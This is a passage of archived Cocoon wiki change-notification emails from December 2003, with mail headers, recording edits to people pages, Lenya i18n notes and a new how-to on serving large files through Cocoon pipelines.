2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonUserGroupHolland , version: 20 on Tue Dec 23 14:09:25 2003 by ArjeCahn + * When? * - Second week of december? Please add your name and the days you prefer! - I (Arje) would like to invite you to come to Amsterdam for the first Borrel. Will think of an exact location. - * Arje (8, 9, 10, 11, 12, 13, 14 december) - * From [email protected] Tue Dec 23 16:00:07 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26562 invoked from network); 23 Dec 2003 16:00:07 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 23 Dec 2003 16:00:07 -0000 Received: (qmail 25572 invoked by uid 500); 23 Dec 2003 16:00:01 -0000 Delivered-To: [email protected] Received: (qmail 25536 invoked by uid 500); 23 Dec 2003 16:00:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 25512 invoked from network); 23 Dec 2003 16:00:01 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 23 Dec 2003 16:00:01 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBNG02O16701 for <[email protected]>; Tue, 23 Dec 2003 17:00:02 +0100 Date: Tue, 23 Dec 2003 17:00:02 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] People Tue Dec 23 17:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=People , version: 227 on Tue Dec 23 15:16:44 2003 by 161.129.204.104 - * [Carsten Ziegeler|CarstenZiegeler] -- Cocoon Release Manager and Committer, Avalon PMC and committer ? ^ ^^^ --------- + * [Carsten Ziegeler|CarstenZiegeler] -- Cocoon Release Manager and committer, Pluto committer ? ^ ^ ++ From [email protected] Tue Dec 23 20:00:11 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26713 invoked from network); 23 Dec 2003 20:00:11 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 23 Dec 2003 20:00:11 -0000 Received: (qmail 96160 invoked by uid 500); 23 Dec 2003 20:00:00 -0000 Delivered-To: [email protected] Received: (qmail 96135 invoked by uid 500); 23 Dec 2003 19:59:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96124 invoked from network); 23 Dec 2003 19:59:59 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 23 Dec 2003 19:59:59 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBNK03O16818 for <[email protected]>; Tue, 23 Dec 2003 21:00:03 +0100 Date: Tue, 23 Dec 2003 21:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] HowTos Tue Dec 23 21:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=HowTos , version: 154 on Tue Dec 23 20:11:01 2003 by 161.129.204.104 + + * __[Serving Large Files]__ -- how to serve really large files - [Litrik] From [email protected] Tue Dec 23 21:00:12 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 52853 invoked from network); 23 Dec 2003 21:00:12 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 23 Dec 2003 21:00:12 -0000 Received: (qmail 91512 invoked by uid 500); 23 Dec 2003 21:00:02 -0000 Delivered-To: [email protected] Received: (qmail 91371 invoked by uid 500); 23 Dec 2003 21:00:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 91333 invoked from network); 23 Dec 2003 21:00:00 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 23 Dec 2003 21:00:00 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBNL05O16845 for <[email protected]>; Tue, 23 Dec 2003 22:00:05 +0100 Date: Tue, 23 Dec 2003 22:00:05 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] HowTos Litrik Main ServingLargeFiles Tue Dec 23 22:00:05 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=HowTos , version: 154 on Tue Dec 23 20:11:01 2003 by 161.129.204.104 + + * __[Serving Large Files]__ -- how to serve really large files - [Litrik] Page: http://wiki.cocoondev.org/Wiki.jsp?page=Litrik , version: 2 on Tue Dec 23 21:06:19 2003 by Litrik - * I work at [Inventive Designers|http://www.inventivedesigners.com/] where I am responsible for the website (among other things). + I work at [Inventive Designers|http://www.inventivedesigners.com/] where I am responsible for the website (among other things). Inventive Designers' website is built completely using Cocoon 2.1 and does the following things: + * Retrieve and display live data from Lotus Domino. + * Protect sections for customers and partners + * Execute iSeries (AS/400) code based on information entered on a form. + * Generate multiple download pages on-the-fly using the DirectoryGenerator + * [Serving Large Files]: +100MB + * Generate a photo album on-the-fly using the ImageDirectoryGenerator + + The following websites are also generated by Cocoon, but crawled and served as static pages: + * [Rolmite|http://www.rolmite.org] Page: http://wiki.cocoondev.org/Wiki.jsp?page=Main , version: 315 on Tue Dec 23 20:49:35 2003 by Litrik + * December 23, 2003 + ** [Serving Large Files] -- [Litrik] Page: http://wiki.cocoondev.org/Wiki.jsp?page=ServingLargeFiles , version: 1 on Tue Dec 23 20:47:43 2003 by Litrik New page created: + !!Serving Large Files + + The following tips are useful when serving really large files (let's say 100MB). + + If you don't want to read all of this stuff... there's an example at the bottom of this page, ready to be copy/pasted ;-) + + !Disable Caching + + You don't want to waste your precious cache space on a 100MB file. + + To disable caching add the following attribute to your pipeline: + {{{ + type="noncaching" + }}} + + Details about enabling/disabling caching can be found on in the [official documentation|http://cocoon.apache.org/2.1/userdocs/concepts/caching.html#How+to+Configure+Caching]. + + !Disable Response Buffering + + ''Each pipeline can buffer the response, before it is send to the client. The default buffer size is unlimited (-1), which means when all bytes of the response are available on the server, they are send with one command directly to the client. Of course, this slows down the response as the whole response is first buffered inside Cocoon and then send to the client instead of directly sending the parts of the response when they are available.'' + + So, by default, the whole file is loaded in memory before being sent to the client. This is __very bad__ and will quickly lead to OutOfMemory errors. + + To disable response buffering add the following child element to your pipeline: + {{{ + <map:parameter name="outputBufferSize" value="0"/> + }}} + + Details about response buffering can be found on in the [official documentation|http://cocoon.apache.org/2.1/userdocs/concepts/caching.html#Configuration+of+Pipelines]. + + !Support byteranges/resumes + + Older versions of Cocoon (2.0.x) had a ByteRangeResourceReader in the scratchpad. This component implemented byterange support which allows clients (browsers or download managers) to resume broken downloads. Since 2.1.x this code was merged into the regular ResourceReader, however that code is buggy. + + A [bug report and patch|http://nagoya.apache.org/bugzilla/show_bug.cgi?id=25712] have been added to BugZilla. It has not yet been committed to CVS. + + !Full Example + {{{ + <map:pipeline type="noncaching"> + <map:parameter name="outputBufferSize" value="0"/> + <map:match pattern="**.zip"> + <map:read src="{1}.zip" mime-type="application/octet-stream"/> + </map:match> + </map:pipeline> + }}} + From [email protected] Tue Dec 23 22:00:11 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 73678 invoked from network); 23 Dec 2003 22:00:11 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 23 Dec 2003 22:00:11 -0000 Received: (qmail 51143 invoked by uid 500); 23 Dec 2003 21:59:59 -0000 Delivered-To: [email protected] Received: (qmail 51010 invoked by uid 500); 23 Dec 2003 21:59:58 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 50979 invoked from network); 23 Dec 2003 21:59:57 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 23 Dec 2003 21:59:57 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBNM02O16872 for <[email protected]>; Tue, 23 Dec 2003 23:00:03 +0100 Date: Tue, 23 Dec 2003 23:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] IvoLimmen Litrik Tue Dec 23 23:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=IvoLimmen , version: 2 on Tue Dec 23 21:46:50 2003 by 161.129.204.104 - I work at Virgil in Amsterdam creating financial reporting applications using Cocoon. + I work at [Virgil|http://www.virgil.nl] in Amsterdam. + Currently working on a project in Cocoon building a financial reporting application. + Page: http://wiki.cocoondev.org/Wiki.jsp?page=Litrik , version: 2 on Tue Dec 23 21:06:19 2003 by Litrik - * I work at [Inventive Designers|http://www.inventivedesigners.com/] where I am responsible for the website (among other things). + I work at [Inventive Designers|http://www.inventivedesigners.com/] where I am responsible for the website (among other things). Inventive Designers' website is built completely using Cocoon 2.1 and does the following things: + * Retrieve and display live data from Lotus Domino. + * Protect sections for customers and partners + * Execute iSeries (AS/400) code based on information entered on a form. + * Generate multiple download pages on-the-fly using the DirectoryGenerator + * [Serving Large Files]: +100MB + * Generate a photo album on-the-fly using the ImageDirectoryGenerator + + The following websites are also generated by Cocoon, but crawled and served as static pages: + * [Rolmite|http://www.rolmite.org] From [email protected] Wed Dec 24 01:00:12 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 26449 invoked from network); 24 Dec 2003 01:00:12 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 24 Dec 2003 01:00:12 -0000 Received: (qmail 18317 invoked by uid 500); 24 Dec 2003 00:59:57 -0000 Delivered-To: [email protected] Received: (qmail 18178 invoked by uid 500); 24 Dec 2003 00:59:56 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18158 invoked from network); 24 Dec 2003 00:59:55 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 24 Dec 2003 00:59:55 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBO102O16964 for <[email protected]>; Wed, 24 Dec 2003 02:00:03 +0100 Date: Wed, 24 Dec 2003 02:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Geert GeertClaes Wed Dec 24 02:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Geert , version: 1 on Wed Dec 24 00:52:09 2003 by Geert New page created: + Geert + Page: http://wiki.cocoondev.org/Wiki.jsp?page=GeertClaes , version: 1 on Wed Dec 24 00:53:07 2003 by GeertClaes New page created: + Geert Claes + From [email protected] Wed Dec 24 06:00:15 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 28841 invoked from network); 24 Dec 2003 06:00:15 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 24 Dec 2003 06:00:15 -0000 Received: (qmail 63246 invoked by uid 500); 24 Dec 2003 05:59:54 -0000 Delivered-To: [email protected] Received: (qmail 63156 invoked by uid 500); 24 Dec 2003 05:59:53 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 63145 invoked from network); 24 Dec 2003 05:59:53 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 24 Dec 2003 05:59:53 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBO603O17437 for <[email protected]>; Wed, 24 Dec 2003 07:00:03 +0100 Date: Wed, 24 Dec 2003 07:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] People LaurentMauron Wed Dec 24 07:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=People , version: 228 on Wed Dec 24 05:31:49 2003 by LaurentMauron + * [Laurent Mauron] -- Cocoon user. - Page: http://wiki.cocoondev.org/Wiki.jsp?page=LaurentMauron , version: 1 on Wed Dec 24 05:38:32 2003 by LaurentMauron New page created: + Cocoon is helping me automate risk reporting tasks at a large financial institution. + From [email protected] Wed Dec 24 15:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 25282 invoked from network); 24 Dec 2003 15:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 24 Dec 2003 15:00:17 -0000 Received: (qmail 18193 invoked by uid 500); 24 Dec 2003 15:00:04 -0000 Delivered-To: [email protected] Received: (qmail 18103 invoked by uid 500); 24 Dec 2003 15:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 17943 invoked from network); 24 Dec 2003 15:00:02 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 24 Dec 2003 15:00:02 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBOF03O17705 for <[email protected]>; Wed, 24 Dec 2003 16:00:03 +0100 Date: Wed, 24 Dec 2003 16:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] People JuankyMoral Wed Dec 24 16:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=People , version: 229 on Wed Dec 24 15:08:32 2003 by JuankyMoral + * [Juanky Moral] -- Web Developer - Cocoon user Page: http://wiki.cocoondev.org/Wiki.jsp?page=JuankyMoral , version: 1 on Wed Dec 24 15:09:21 2003 by JuankyMoral New page created: + !!!Bienvenido a mi página + From [email protected] Wed Dec 24 16:00:13 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 41515 invoked from network); 24 Dec 2003 16:00:13 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 24 Dec 2003 16:00:13 -0000 Received: (qmail 66046 invoked by uid 500); 24 Dec 2003 16:00:07 -0000 Delivered-To: [email protected] Received: (qmail 65914 invoked by uid 500); 24 Dec 2003 16:00:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 65898 invoked from network); 24 Dec 2003 16:00:06 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 24 Dec 2003 16:00:06 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBOG05O17732 for <[email protected]>; Wed, 24 Dec 2003 17:00:08 +0100 Date: Wed, 24 Dec 2003 17:00:08 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] People JuankyMoral WoodyBinding Wed Dec 24 17:00:05 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=People , version: 229 on Wed Dec 24 15:08:32 2003 by JuankyMoral + * [Juanky Moral] -- Web Developer - Cocoon user Page: http://wiki.cocoondev.org/Wiki.jsp?page=JuankyMoral , version: 1 on Wed Dec 24 15:09:21 2003 by JuankyMoral New page created: + !!!Bienvenido a mi página + Page: http://wiki.cocoondev.org/Wiki.jsp?page=WoodyBinding , version: 23 on Wed Dec 24 15:36:16 2003 by MarcPortier - - If the readonly attribute is specified with a value of true, the binding will only happen in one direction: from the object to the form. From [email protected] Wed Dec 24 20:00:10 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 10404 invoked from network); 24 Dec 2003 20:00:10 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 24 Dec 2003 20:00:10 -0000 Received: (qmail 14512 invoked by uid 500); 24 Dec 2003 20:00:00 -0000 Delivered-To: [email protected] Received: (qmail 14460 invoked by uid 500); 24 Dec 2003 19:59:59 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 14449 invoked from network); 24 Dec 2003 19:59:59 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 24 Dec 2003 19:59:59 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBOK02O17828 for <[email protected]>; Wed, 24 Dec 2003 21:00:03 +0100 Date: Wed, 24 Dec 2003 21:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] SandBox Wed Dec 24 21:00:02 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=SandBox , version: 209 on Wed Dec 24 19:20:47 2003 by 161.129.204.104 + * __[webapp example .. | http://imp.blubbmon.de]__ From [email protected] Thu Dec 25 09:00:17 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 163 invoked from network); 25 Dec 2003 09:00:17 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 25 Dec 2003 09:00:17 -0000 Received: (qmail 77803 invoked by uid 500); 25 Dec 2003 08:59:52 -0000 Delivered-To: [email protected] Received: (qmail 77660 invoked by uid 500); 25 Dec 2003 08:59:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 77649 invoked from network); 25 Dec 2003 08:59:51 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 25 Dec 2003 08:59:51 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBP903O18487 for <[email protected]>; Thu, 25 Dec 2003 10:00:03 +0100 Date: Thu, 25 Dec 2003 10:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] CocoonAndApache Thu Dec 25 10:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=CocoonAndApache , version: 13 on Thu Dec 25 08:40:32 2003 by 161.129.204.104 From [email protected] Thu Dec 25 13:00:07 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 43550 invoked from network); 25 Dec 2003 13:00:07 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 25 Dec 2003 13:00:07 -0000 Received: (qmail 96476 invoked by uid 500); 25 Dec 2003 13:00:05 -0000 Delivered-To: [email protected] Received: (qmail 96440 invoked by uid 500); 25 Dec 2003 13:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 96427 invoked from network); 25 Dec 2003 13:00:04 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 25 Dec 2003 13:00:04 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBPD03O18583 for <[email protected]>; Thu, 25 Dec 2003 14:00:04 +0100 Date: Thu, 25 Dec 2003 14:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Lenya BeginnerInstallTomcatWindows Thu Dec 25 14:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Lenya , version: 47 on Thu Dec 25 13:10:20 2003 by RolfKulemann + * [LenyaI18N] Page: http://wiki.cocoondev.org/Wiki.jsp?page=BeginnerInstallTomcatWindows , version: 10 on Thu Dec 25 12:39:25 2003 by 161.129.204.104 + + __NOTE:__ To avoid errors, make sure that there are no spaces in the path name if you want to use JSP. From [email protected] Thu Dec 25 14:00:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 55371 invoked from network); 25 Dec 2003 14:00:07 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 25 Dec 2003 14:00:07 -0000 Received: (qmail 18074 invoked by uid 500); 25 Dec 2003 14:00:04 -0000 Delivered-To: [email protected] Received: (qmail 18042 invoked by uid 500); 25 Dec 2003 14:00:04 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 18031 invoked from network); 25 Dec 2003 14:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 25 Dec 2003 14:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBPE03O18610 for <[email protected]>; Thu, 25 Dec 2003 15:00:04 +0100 Date: Thu, 25 Dec 2003 15:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] Lenya LenyaI18N Thu Dec 25 15:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=Lenya , version: 47 on Thu Dec 25 13:10:20 2003 by RolfKulemann + * [LenyaI18N] Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 16 on Thu Dec 25 14:03:25 2003 by RolfKulemann - Documents can be authored in multiple languages. each language version is stored in separate file fitting a file name pattern which currently is myfilename_[de,en,whatever].xml. The ''negotiation protocol'' is simply defined within the request url. Should mean, a Lenya class i.e. the DefaultDocumentBuilder looks for a language identifier in the request uri. Based on that information the appropiate language version of the requested document is served. ? ^^ ^ ----------- + Documents can be authored in multiple languages. each language version is stored in separate file fitting a file name pattern which currently is myfilename_languagelocale.xml. The ''negotiation protocol'' is simply defined within the request url. Should mean, a Lenya class i.e. the DefaultDocumentBuilder looks for a language identifier in the request uri. Based on that information the appropiate language version of the requested document is served. ? ^^^^^^^ ^^^^^ From [email protected] Thu Dec 25 15:00:08 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 70949 invoked from network); 25 Dec 2003 15:00:08 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 25 Dec 2003 15:00:08 -0000 Received: (qmail 43301 invoked by uid 500); 25 Dec 2003 15:00:03 -0000 Delivered-To: [email protected] Received: (qmail 43280 invoked by uid 500); 25 Dec 2003 15:00:03 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 43269 invoked from network); 25 Dec 2003 15:00:03 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 25 Dec 2003 15:00:03 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBPF04O18637 for <[email protected]>; Thu, 25 Dec 2003 16:00:04 +0100 Date: Thu, 25 Dec 2003 16:00:04 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Thu Dec 25 16:00:04 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 23 on Thu Dec 25 14:43:01 2003 by RolfKulemann - Unfortunately at least one thread - I couldn't find it in gmane - is not lisited here. Its topic is ''Localization of Lenya'' and was posted on 2003/11/29 by Pawel Potoczek to Lenya-Dev. + Unfortunately at least one thread - I couldn't find it in gmane - is not lisited here. Its topic is ''Localization of Lenya'' and was posted on 2003/11/29 by Pawel Potoczek to [Lenya-Dev|http://news.gmane.org/gmane.comp.cms.lenya.devel]. ? + ++++++++++++ ++++++++++++++++++++++++++++++++++++++ From [email protected] Thu Dec 25 18:00:09 2003 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 943 invoked from network); 25 Dec 2003 18:00:09 -0000 Received: from daedalus.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur-2.apache.org with SMTP; 25 Dec 2003 18:00:09 -0000 Received: (qmail 9517 invoked by uid 500); 25 Dec 2003 18:00:02 -0000 Delivered-To: [email protected] Received: (qmail 9378 invoked by uid 500); 25 Dec 2003 18:00:01 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> list-post: <mailto:[email protected]> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 9337 invoked from network); 25 Dec 2003 18:00:00 -0000 Received: from unknown (HELO otsrv1.iic.ugent.be) (161.129.204.104) by daedalus.apache.org with SMTP; 25 Dec 2003 18:00:00 -0000 Received: from otsrv1.iic.ugent.be (localhost [161.129.204.104]) by otsrv1.iic.ugent.be (8.11.6/8.11.6) with ESMTP id hBPI03O18716 for <[email protected]>; Thu, 25 Dec 2003 19:00:03 +0100 Date: Thu, 25 Dec 2003 19:00:03 +0100 Message-Id: <[email protected]> From: [email protected] To: [email protected] Subject: [WIKI-UPDATE] LenyaI18N Thu Dec 25 19:00:03 2003 X-Spam-Rating: daedalus.apache.org 1.6.2 0/1000/N X-Spam-Rating: minotaur-2.apache.org 1.6.2 0/1000/N Page: http://wiki.cocoondev.org/Wiki.jsp?page=LenyaI18N , version: 27 on Thu Dec 25 17:56:58 2003 by RolfKulemann - __Documents can be authored in multiple languages.__ Each language version is stored in separate file fitting a file name pattern which currently is myfilename_locale.xml i.e. tutorial_de.html or tutorial_en.html.. The ''language negotiation protocol'' is simply defined within the request url. Should mean, a Lenya class i.e. the DefaultDocumentBuilder searches for a language identifier like en or de in the request uri. Based on that information the appropiate language version of the requested document is served. ? - + __Documents can be authored in multiple languages.__ Each language version is stored in separate file fitting a file name pattern which currently is myfilename_locale.xml i.e. tutorial_de.html or tutorial_en.html. The ''language negotiation protocol'' is simply defined within the request url. Should 